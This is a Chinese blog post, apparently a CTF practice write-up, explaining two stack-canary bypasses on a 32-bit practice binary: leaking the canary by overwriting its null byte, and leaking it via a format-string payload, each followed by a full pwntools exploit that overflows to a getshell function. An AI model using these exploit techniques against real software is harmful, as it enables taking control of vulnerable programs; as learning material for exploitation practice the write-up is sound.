Canary 的绕过方法

已于 2024-04-01 22:43:11 修改
阅读量1.3k 收藏 28
点赞数 35
文章标签: 网络 安全
于 2024-03-31 00:48:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/137185899
版权

题目下载

一、字符串截断获取canary

原理:

  • Canary设计其低字节为\x00,本意是阻止被read、write等函数直接将Canary读出来。通过栈溢出将低位的\x00覆写,就可以读出Canary的值。

二话不说,上题

6223550f8e3e4c60ae7082a12022b3ca.png

基础检查发现canary

丢入ida中

6f93bd166048427ba3796ec9a35e6b99.png

发现在循环printf,并且存在字符串漏洞(这个稍后再谈)

同时有getshell函数

5fff2e7654994c959a787379c631f431.png

可以直接拿shell

接下来就是找canary到栈顶的偏移

有两种方法,这里先介绍第一种

看汇编语言

跟进这段函数的汇编

d956f906af944a789bc7d78ba25202e5.png

发现 多了一段异或比较 

可以判断canary在var_c里,

5b1854f6dfb54f5ca15abc72a1837651.png

f7dba2417db64cdc9645919df209fb01.png

所以buf 到canary的偏移为0x70-0xc

payload1的构造为

payload1=b'a'*(0x70-0xc)

#注意 必须用sendline 发送 用\n来覆盖'\x00'

发送之后接受字符

canary=u32(io.recv(4))-0xa
#这里之所以要-0xa 是要去掉\n

最后构造payload2

payload2=b'a'*(0x70-0xc)+p32(canary)+b'a'*0xc+p32(getshell)

最终exp为

from pwn import *

context.binary = '1122'
#context.log_level = 'debug'
io = process('./1122')

get_shell = ELF("./1122").sym["getshell"]

io.recvuntil("Hello Hacker!\n")

# leak Canary
payload = b"A"*100
io.sendline(payload)

io.recvuntil("A"*100)
Canary = u32(io.recv(4))-0xa
log.info("Canary:"+hex(Canary))

# Bypass Canary
payload = b"a"*100+p32(Canary)+b"a"*12+p32(get_shell)
io.send(payload)

io.recv()

io.interactive()

最后强调一下

context.binary = '1122'
#context.log_level = 'debug'

这两行必须要有一个,否则无法运行

最后运行得到shell

ca95917ac9e1484f9a56feced23da1f2.png二、字符串漏洞泄露canary

原理

  • 格式化字符串漏洞可以打印出栈中的内容,因此利用此漏洞可以打印出canary的值,从而进行栈溢出

还是上面那道题

这次来介绍一下另一种寻找偏移的办法

用gdb 调试

先用gdb在printf处下断点

 069eedb8baaf434d8bf7fd0ab21cd043.png

找到第一个printf下的栈帧0xffffcf98

f7ae2cdad1db4aa1b71ce47469ed8fd4.png

从ida上知道程序主要在vuln 函数里面

用gdb 运行文件并在函数下断点运行

941cd70ce30a4bfcb829b9ff7f297d71.png

7487d0485f5344ddafb8aea6481704cf.png

发现有一段异或比较,可以判断canary 的值就在eax里面

不断步入到0x8049256

9c1dc74116fb40bca8a1cb7166632c72.png

记住eax的值

查看前50的栈帧

74f6a425289f4a8cad1acfb4f159c845.png

发现canary存在地址0xc中

可以计算偏移

2a986d1cd1b44f7bb9f2273a28bd9f5b.png

继续点n

到read 函数运行(这一步很重要,否则偏移不准确)

10a259f6189942188c17b19f0159cea2.png

再次查看栈帧计算此时canary 到esp的偏移量

4bd86eacf67a4be4a83da8827b9c527f.png

因为程序是32位

4个字节一组就是31组

所以canary的偏移为31

这部分可参考

https://www.freebuf.com/articles/system/233515.html

https://blog.csdn.net/glhdbk/article/details/100595050

则payload1可构造

payload_1 = b'%x-' * ( 6 + 25)
conn.send(payload_1)
recvbytes = conn.recv()

# 获取canary
canary = int(recvbytes.split(b'-')[-2], 16)

泄露出canary的值

最后进行再一次栈溢出

payload_2 = b'a' * (0x70 - 0xc) + p32(canary) + b'a'*0xc+ p32(getshell)

最终exp

from pwn import *
context.log_level = 'debug'
#context.log_level = 'debug'


conn = process('./1122')

getshell = 0x080491b6
conn.recvuntil('Hello Hacker!\n')

# 第一次溢出
payload_1 = b'%x-' * ( 6 + 25)
conn.send(payload_1)
recvbytes = conn.recv()

# 获取canary
canary = int(recvbytes.split(b'-')[-2], 16)
print(f'Canary: {hex(canary)}')
# 第二次溢出
payload_2 = b'a' * (0x70 - 0xc) + p32(canary) + b'a'*0xc+ p32(getshell)
conn.send(payload_2)
conn.recv()
conn.interactive()

笔者纯小白 有错误希望指出

呀卡吗洗.
关注
  • 35
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
02-24
Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。Stackcanary保护机制在刚进入函数时,在栈上放置一个标志canary,然后在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。一,实验源码文件名:Canary.c命令:gcc-m32-ggdb-zexecstack-fstack-protector-no-pie-opwnmeCannary.c使用lddpwnme,查看libc文件的加载位置是否会变如果会改变,为了调试方便,可以使用:echo0>/proc/s
【八芒星计划】绕过canary
carol2358的博客
09-02 650
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得栈地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
【PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 683
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
pwn学习---借助格式化输出绕过canary保护
gclome的博客
03-29 485
0x01 原理简介 格式化字符串漏洞是因为c语言中printf的参数个数不是确定的,参数的长度也不是确定的,当printf把我们的输入当作第一个参数直接输出的时候,我们输入若干格式化字符串,会增加与格式化字符串相对应的参数,会泄露出栈中的内容 Stack canary保护机制在刚进入函数时,在栈上放置一个标志canary,然后 在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。...
pwn-canary绕过和PIE(未完待续)
m0_75234353的博客
05-30 895
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
stack canary绕过思路
sea_time的博客
11-29 1923
canary 简介: 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,...
栈溢出之canary泄露与绕过“新方法” .pdf
09-05
栈溢出之canary泄露与绕过“新方法” 安全防御 安全架构web安全 安全对抗 web安全
HttpCanary.pem证书
07-26
安装HttpCanary之后,需要安装证书,有些手机需要在设置里自行安装,需要导入此文件进行安装。
C语言函数调用栈,栈溢出基础,canary和pie保护的绕过思路
WdIg-2023的博客
01-19 1023
C语言函数调用栈,栈溢出基础,canary和pie保护的绕过思路
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 2157
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
绕过canary原理及其利用方式
glhdbk的博客
09-07 4188
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
Canary保护机制及绕过
二狗的博客
01-29 794
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Java网络编程(上)
最新发布
qq_34471880的博客
06-01 816
数据在网络的传输, 局域网的概念, 广域网的概念, 网络协议, TCP五层模型, 网络封装 网络分用
冶炼钢铁厂热风炉发酵池煤矸石进回水无线远程温度监测
weixin_46970383的博客
05-30 299
Modbus RTU 标准Modbus-RTU通信协议。Modbus RTU使用二进制格式传输数据,并使用串行通信协议(如RS-232或RS-485)进行数据传输。它通常用于连接不同厂家的可编程逻辑控制器(PLC)、传感器、执行器和其他自动化设备。
note-网络是怎样连接的4 接入网和网络运营商
qq_42783188的博客
05-29 413
在BAS和运营商路由器之间的ADSL/FTTH接入服务商的网络中建立隧道,把用户到BAS的接入网连接起来,形成一条从用户一直到运营商路由器的通道。这些状况不是稳定出现的。一方路由器让相连的运营商的路由器告知路由信息后,就能知道对方路由器连接的所有网络,把这些信息写入自己的路由表中,就能向那些网络发送包了。运营商之间的路由交换是在特定路由器间一对一进行的,运营商可以只将路由信息提供给交了费的运营商,没交费的运营商无法将网络包发送过来。Modem产生的信号是以一定周期振动的波,振动的起始位置不同,波形就不同。
解密网络流量监控:优化IT运维的利器
Johnstons的博客
05-29 341
通过实时监测和分析网络流量,管理员可以及时发现并解决网络问题,确保业务的顺畅进行。作为一名资深网络工程师,我将分享一些关于网络流量监控的重要知识,并探讨如何在IT运维中运用这一工具优化网络性能,确保业务的顺畅进行。网络流量监控是指对网络中的数据流进行实时监测和分析,以了解网络使用情况、性能状况和潜在问题。通过网络流量监控,可以及时发现网络拥塞、异常流量和安全威胁,帮助管理员快速做出反应,保障网络的稳定运行。定期对监控数据进行分析,发现网络性能问题的潜在原因,并采取相应的优化措施,从而持续提升网络性能。
HttpCanary
02-15
HttpCanary 是一款移动端应用,用于抓取和分析移动端网络请求数据。它允许您捕获移动设备上的所有 HTTP 和 HTTPS 请求和响应,并通过其人性化的界面展示您的网络通信的详细信息。这对于调试应用程序,分析网络性能和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值